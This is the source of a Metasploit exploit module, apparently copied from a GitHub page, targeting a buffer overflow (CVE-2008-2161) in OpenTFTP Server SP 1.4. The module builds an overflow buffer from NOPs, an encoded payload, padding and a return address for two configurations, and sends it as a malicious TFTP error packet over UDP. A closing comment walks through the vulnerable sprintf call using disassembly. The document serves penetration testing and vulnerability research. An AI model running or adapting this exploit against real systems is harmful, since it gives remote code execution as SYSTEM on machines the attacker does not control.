Path: blob/master/modules/exploits/windows/tftp/opentftp_error_code.rb
19664 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = AverageRanking78include Msf::Exploit::Remote::Udp910def initialize(info = {})11super(12update_info(13info,14'Name' => 'OpenTFTP SP 1.4 Error Packet Overflow',15'Description' => %q{16This module exploits a buffer overflow in OpenTFTP Server SP 1.4. The vulnerable17condition triggers when the TFTP opcode is configured as an error packet, the TFTP18service will then format the message using a sprintf() function, which causes an19overflow, therefore allowing remote code execution under the context of SYSTEM.2021The offset (to EIP) is specific to how the TFTP was started (as a 'Stand Alone',22or 'Service'). By default the target is set to 'Service' because that's the default23configuration during OpenTFTP Server SP 1.4's installation.24},25'Author' => [26'tixxDZ', # Initial discovery, poc27'steponequit' # Metasploit module28],29'References' => [30['CVE', '2008-2161'],31['OSVDB', '44904'],32['BID', '29111'],33['URL', 'http://downloads.securityfocus.com/vulnerabilities/exploits/29111.pl']34],35'DefaultOptions' => {36'EXITFUNC' => 'process',37},38'Payload' => {39'Space' => 5000,40'BadChars' => "\x00\x0a\x0d",41'StackAdjustment' => -3500,42},43'Platform' => 'win',44'Targets' => [45# .bss section that is overwritten46[ 'OpenTFTP 1.4 Service', { 'Ret' => 0x0041b3ab } ],47[ 'OpenTFTP 1.4 Stand Alone', { 'Ret' => 0x0041b3ab } ]4849],50# TFTP server is installed as an NT service by default51'DefaultTarget' => 0,52'Privileged' => false,53'DisclosureDate' => '2008-07-05',54'Notes' => {55'Reliability' => UNKNOWN_RELIABILITY,56'Stability' => UNKNOWN_STABILITY,57'SideEffects' => UNKNOWN_SIDE_EFFECTS58}59)60)6162register_options(63[64Opt::RPORT(69),65]66)67end6869def exploit70if target.name =~ /OpenTFTP 1.4 Stand Alone/71# This hits msvcrt.printf()72sploit = "\x00\x05" + make_nops(10)73sploit << payload.encoded74sploit << rand_text_alpha(20517 - payload.encoded.length)75sploit << [target['Ret']].pack('V')76sploit << Rex::Text.rand_text_alpha(1469)7778elsif target.name =~ /OpenTFTP 1.4 Service/79# This hits time()80sploit = "\x00\x05" + make_nops(10)81sploit << payload.encoded82sploit << rand_text_alpha(20445 - payload.encoded.length)83sploit << [target['Ret']].pack('V')84sploit << Rex::Text.rand_text_alpha(1545)85end8687# Send the malicious packet88connect_udp89udp_sock.put(sploit)90handler91disconnect_udp92end93end9495=begin96NOTE: If the module is run on a OSX box, you will probably see this error:97[-] Exploit exception: Message too long98That's OSX for you.99100The vulnerable condition triggers when the TFTP opcode "\x00\x05" gets parsed in a ntohs() call:101.text:004022F6 mov eax, ds:dword_41B370102.text:004022FB movzx eax, word ptr [eax]103.text:004022FE mov [esp+5C8h+var_5C8], eax104.text:00402301 mov [ebp+var_550], 0FFFFFFFFh105.text:0040230B call ntohs106.text:00402310 sub esp, 4107.text:00402313 cmp ax, 5108.text:00402317 jnz short loc_40236F109...110111When the value matches 0x05, we then head down to a sprinf() function to generate an error112message, which causes an overflow:113.text:00402330 mov eax, ds:dword_41B370114.text:00402335 add eax, 4115.text:00402338 mov [esp+5C8h+var_5BC], eax116.text:0040233C mov [esp+5C8h+var_5C0], edx117.text:00402340 mov [esp+5C8h+var_5C4], offset aErrorIAtClient ; "Error %i at Client, %s"118.text:00402348 mov [esp+5C8h+var_5C8], offset byte_41B394119.text:0040234F call sprintf120121And then we either corrupt a msvcrt.printf() or time() call (in logMess), which end up gaining122control.123124In source:125http://pastebin.com/QgZDwcan126127else if (ntohs(datain->opcode) == 5) // Line 224128{129sprintf(serverError.errormessage, "Error %i at Client, %s", ntohs(datain->block), &datain->buffer);130logMess(req1, 1);131..... so on .....132133You can also corrupt a SetServiceStatus() call with a smaller buffer, but obviously doesn't134give you a better crash than this one.135=end136137138